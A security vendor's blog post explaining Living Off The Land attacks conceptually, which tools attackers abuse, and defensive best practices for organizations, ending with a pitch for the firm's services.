Staying ahead of emerging cybersecurity threats has become an essential responsibility for organizations of all sizes. One such threat that has recently gained significant traction is the so-called Living Off The Land (LOTL) attack.
According to CrowdStrike’s 2023 threat report, a staggering 62% of detections in 2023 can be classified as LOTL attacks. Owners, IT managers, and decision-makers can’t afford to ignore this statistic. Instead, they must familiarize themselves with this advanced attack technique to protect their valuable data and maintain business continuity.
What Are LOTL Attacks?
Quick definition: A LOTL attack is a cyberattack technique that leverages existing tools, services, and processes within a target’s environment to carry out malicious activities.
Just as the Greeks used a seemingly innocuous wooden horse to stealthily infiltrate and overcome the city of Troy, traditional malware often masquerades as legitimate files to breach digital defenses and cause damage.
Such digital Trojan horses, or trojans for short, have caused a lot of damage in the past. For example, the ILOVEYOU trojan caused $8.7 billion in global losses after it was released in 2000. However, as modern organizations have become more cybersecurity-aware, they are less likely to allow unverified files into their networks without thorough scrutiny. As a result, most trojans are detected and neutralized before they can inflict significant damage.
To overcome this challenge, attackers have shifted their focus to LOTL attacks, which take advantage of the trust placed in existing tools and processes.
By infecting native system utilities, approved applications, and other binaries, such as PowerShell, Certutil, Windows Management Instrumentation (WMI), Remote Desktop Protocol (RDP), and others, attackers can carry out their malicious objectives without raising suspicion.
These non-malicious binaries are typically referred to as Living Off The Land Binaries (LOLBins) or, when scripts are infected, Living Off The Land Scripts (LOLScripts). Their legitimate status and essential roles in daily operations mean they are often overlooked by security systems or at least very difficult to properly analyze using traditional security tools.
For example, PowerShell, a command-line shell for the Windows operating system, was targeted, among others, by the LockBit cybercriminal group, which used it to carry out ransomware attacks that encrypt the victim’s data and demand payment of a ransom.
Download
DoD Contractor’s Guide to CMMC 2.0 Compliance
How Do LOTL Attacks Work?
As we’ve just explained, LOTL attacks take advantage of existing LOLBins and LOLScripts, but how exactly? Let’s take a quick look:
- A LOTL attack often starts with a simple user interaction, such as visiting a compromised website, opening a phishing email, accessing a malicious website, or inserting an infected USB drive into a computer. The initial interaction allows the attacker to exploit an operating system or application vulnerability and inject fileless malware into legitimate software, where it can blend in with normal system activity.
- With the fileless malware in place, the attacker can execute their malicious objectives, such as providing remote access, stealing data, or disrupting operations. Since the malicious activity is hidden in plain sight, using trusted programs and tools, it can be challenging for security systems to identify and respond to the threat.
- To maintain continued access to the compromised system, attackers often employ techniques such as modifying the Windows registry, creating new user accounts with administrative privileges, or embedding malicious code into the system’s kernel. This allows them to continually reap the benefits of unauthorized access via trusted programs.
The three steps can happen in basically no time unless the targeted organization has implemented robust security measures to detect and defend against LOTL attacks.
Best Practices Against LOTL Attacks
While defending against LOTL can be difficult due to their reliance on legitimate system tools and processes, there are many highly effective best practices that any organization can implement to improve its defense posture against these advanced threats:
- Implement comprehensive and verbose logging: Maintain detailed logs of all system events, including network traffic, user activities, and process execution. Centralize these logs in a secure location so that you can analyze them properly.
- Perform behavior analysis: Advanced analytics tools, often incorporated into Security Information and Event Management (SIEM) solutions, can be used to analyze logs and detect unusual patterns of behavior that deviate from established norms.
- Reduce alert noise: Refine monitoring tools and alerting mechanisms to differentiate between typical administrative actions and potential threat behavior. When done correctly, you should receive a smaller number of more meaningful alerts, which in turn lowers the risk of alert fatigue.
- Perform system and software audits. Develop an inventory of existing configurations, policies, and installed software on each host. Uninstall unnecessary software to limit the LOLBins and LOLScripts available to attackers.
- Segment your network. Limit lateral movement possibilities for threat actors by segmenting your network into smaller, isolated zones. In a cloud environment, apply the same principles by architecting cloud enclaves using subnet or security group tools.
- Implement just-in-time access. A Privileged Access Management (PAM) solution can be used to grant temporary access to privileged accounts only when necessary and revoke access once the task is completed to minimize the risk of compromised credentials being used for LOTL attacks.
- Invest in employee education: Educate your employees about the dangers of LOTL attacks and how something as seemingly innocuous as clicking on links or opening attachments from unknown sources can have severe consequences.
For more information about the best practices against LOTL attacks, we recommend the joint guidance, titled Identifying and Mitigating Living Off the Land Techniques (PDF), CISA has recently co-authored with several agencies from the USA, Australia, Canada, the United Kingdom, and New Zealand.
Conclusion
Living off the land (LOTL) attacks represent a significant risk because they can cleverly disguise themselves within your existing systems. But there’s no reason to let them compromise your organization. OSIbeyond’s expert team provides robust cybersecurity solutions, including advanced monitoring, threat detection, and proactive defense strategies, to keep you ahead of LOTL attacks and other emerging threats. Contact us today for more information.